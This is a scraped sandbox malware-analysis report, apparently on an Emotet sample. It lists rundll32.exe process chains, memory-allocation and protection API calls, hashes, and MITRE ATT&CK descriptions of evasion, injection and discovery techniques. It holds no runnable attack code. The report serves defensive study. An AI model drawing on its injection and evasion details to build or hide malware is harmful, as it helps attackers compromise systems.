Instruction Fuzzy Hash: C3113060D08289DEEB01D7E888097EFBFB55B21704F044098E6446A282D3BA57598BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 852 Parent PID: 2964 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 001F0530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001F0575
UnmapViewOfFile.KERNELBASE(?), ref: 001F0625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001F063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 001F0770

Memory Dump Source

Source File: 0000000A.00000002.2216562952.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1d0000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 9021a15e1dc5835b967d80cd736f7ecb62d8fd25548fef2e47bddc850f6fc669
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: A1B19AB4E00109DFCB48CF84C591AAEB7B5BF88314F248159E915AB356D735EE82CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001EFF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001EFFD4

Strings

VirtualAlloc, xrefs: 001EFFB9, 001EFFBC

Memory Dump Source

Source File: 0000000A.00000002.2216562952.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1d0000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 7ab20890de5b1e953f89c4f95033bef80008fe7e80f458bedc870849edd8d81a
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: 8B113360D082CDDEEB01D7E88809BFFBFB55F21704F044098D6446A282D3BA575987A6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2280 Parent PID: 852 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 00200530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00200575
UnmapViewOfFile.KERNELBASE(?), ref: 00200625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0020063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00200770

Memory Dump Source

Source File: 0000000B.00000002.2227055049.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1e0000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 2e902d54eb8f608be25fed223f339b1c0dddab334ccfc58f6b2a230a85d1f212
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 2FB19B74E002099FDB48CF84C591EAEB7B5BF88304F208159E919AB356D735EE92CF94

Uniqueness

Uniqueness Score: -1.00%

Function 001FFF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001FFFD4

Strings

VirtualAlloc, xrefs: 001FFFB9, 001FFFBC

Memory Dump Source

Source File: 0000000B.00000002.2227055049.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1e0000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 7c08896f708c98f406f6e5839c59a2d7918cab226132dc35072544878dff933f
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: EF113060D0828DDEEB01D7E884097FFBFB55F11704F044098D6446A282D2BA57598BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 620 Parent PID: 2280 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 001A0530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001A0575
UnmapViewOfFile.KERNELBASE(?), ref: 001A0625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001A063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 001A0770

Memory Dump Source

Source File: 0000000C.00000002.2237093959.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 336a9459a41ae7e1f47b105f39a715a65b8de83f11da04df203158351b00b5fc
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: F7B19A78E00109DFCB48CF84C591AAEB7B5BF88314F248159E919AB355D735EE82CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0019FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019FFD4

Strings

VirtualAlloc, xrefs: 0019FFB9, 0019FFBC

Memory Dump Source

Source File: 0000000C.00000002.2237093959.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: de335e17235b09190b637927304141649476f6793a9ad5fd71d5d0809f082e2f
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: A4113060D08289EEEF01D7E888097EFBFB55F21704F044098D6446A282D3BA57598BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 1924 Parent PID: 620 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 003C0530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 003C0575
UnmapViewOfFile.KERNELBASE(?), ref: 003C0625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 003C063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 003C0770

Memory Dump Source

Source File: 0000000D.00000002.2248409734.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_3a0000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: f7a6abc1850a962843b564d099b40a89fa16e47a170ea7f1bc66c8474f3e495c
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 4EB189B5A00109DFCB48CF84C591EAEB7B5BF88304F248159E919AB355D735EE82CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 003BFF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 003BFFD4

Strings

VirtualAlloc, xrefs: 003BFFB9, 003BFFBC

Memory Dump Source

Source File: 0000000D.00000002.2248409734.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_3a0000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 66f3d52c4e402b4b99e7015f58b0d8930e7de9a82a46c991964652fc8885d603
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: 591100A0D082C9DEEB01D7E89809BEFBFB55B11708F044098D6456A282D6BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2744 Parent PID: 1924 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 00190530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00190575
UnmapViewOfFile.KERNELBASE(?), ref: 00190625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00190770

Memory Dump Source

Source File: 0000000E.00000002.2258724181.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: aea1f403cb3254309c980acc42e4dccf62f7f7b91da7773a6c9d4baf8a4c9e6a
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: DEB199B5E00109DFCB48CF84C591AAEB7B5BF88314F248159E919AB355D735EE82CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018FFD4

Strings

VirtualAlloc, xrefs: 0018FFB9, 0018FFBC

Memory Dump Source

Source File: 0000000E.00000002.2258724181.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 8a0e2f16d3e2f68090e21e5e7611a51a1228c9cb88d0a34e35e9d00eb20a6ec8
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: 8D113060D08289EEEF01D7E8880A7EFBFB55B21704F044098D6446A282D3BA57598BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2176 Parent PID: 2744 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 00220530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00220575
UnmapViewOfFile.KERNELBASE(?), ref: 00220625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0022063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00220770

Memory Dump Source

Source File: 0000000F.00000002.2269442914.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_200000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 00e88c1117e0c3b4ceee0d213066e79126017e98e7d40dcd939e9d18aeab0a39
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 09B19A74E00109AFCB48CF84D591AAEB7B5BF88304F208159E919AB356D735EE92CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0021FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0021FFD4

Strings

VirtualAlloc, xrefs: 0021FFB9, 0021FFBC

Memory Dump Source

Source File: 0000000F.00000002.2269442914.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_200000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 30e7e9b02bc970f5c3576ad605b9d45b37784b2eb180760db78a940ab82c0233
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: C0113060D08289EEEB01D7E894097EFBFB55B21704F044098D6446A282D2BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 532 Parent PID: 2176 rundll32.exeCOMMON

Executed Functions

Function 00130530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00130575
UnmapViewOfFile.KERNELBASE(?), ref: 00130625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0013063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00130770

Memory Dump Source

Source File: 00000010.00000002.2280474154.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_110000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 8f489cd1fffb4d7c4c166172f5d0a500ab545baf759476b436eff41e66ea7442
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 0FB198B4E00109DFCB48CF84C591AAEB7B5BF88314F208159E919AB355D735EE82CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0012FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0012FFD4

Strings

VirtualAlloc, xrefs: 0012FFB9, 0012FFBC

Memory Dump Source

Source File: 00000010.00000002.2280474154.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_110000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 1397845e560cdcdf229358a4bd984656a80973dc7b21122afec98b39c880bf2a
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: CB113060D0828DDEEB01D7E898097EFBFB55B21704F044098D6446A282D3BA57598BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2104 Parent PID: 532 rundll32.exeCOMMON

Executed Functions

Function 00210530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00210575
UnmapViewOfFile.KERNEL32(?), ref: 00210625
VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 0021063F
VirtualProtect.KERNEL32(?,?,00000000), ref: 00210770

Memory Dump Source

Source File: 00000011.00000002.2346029862.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1f0000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 12da7ea77053d9a4454a67c47f97abb959356eab343d44c8e8639802e2d4a6cd
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: A5B198B4E00109DFCB48CF94C591AAEB7B5BF98304F208159E919AB345D775EE92CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0020FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0020FFD4

Strings

VirtualAlloc, xrefs: 0020FFB9, 0020FFBC

Memory Dump Source

Source File: 00000011.00000002.2346029862.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1f0000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 83315a3cf3cf2dacbed528e6ed80a8dc6b12b11bad318e9238a6ee6467b7b864
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: FA113060D08389DEEB01D7E884097EFBFB55B21704F044098E6446A282D2BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Io8ic2291n

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

